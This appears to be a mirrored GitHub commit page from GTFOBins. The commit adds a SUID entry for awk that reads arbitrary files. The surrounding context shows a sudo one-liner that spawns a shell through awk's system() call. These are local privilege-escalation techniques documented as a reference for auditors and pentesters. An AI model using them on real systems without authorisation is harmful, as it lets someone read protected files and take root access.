mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-25 06:19:27 +01:00
Add SUID category to awk
This commit is contained in:
parent
a48303c2b9
commit
fd719bb4b6
@ -27,6 +27,10 @@ functions:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
awk '//' "$LFILE"
|
||||
suid:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
awk '//' "$LFILE"
|
||||
sudo:
|
||||
- code: sudo awk 'BEGIN {system("/bin/sh")}'
|
||||
limited-suid:
|
||||
|
Loading…
Reference in New Issue
Block a user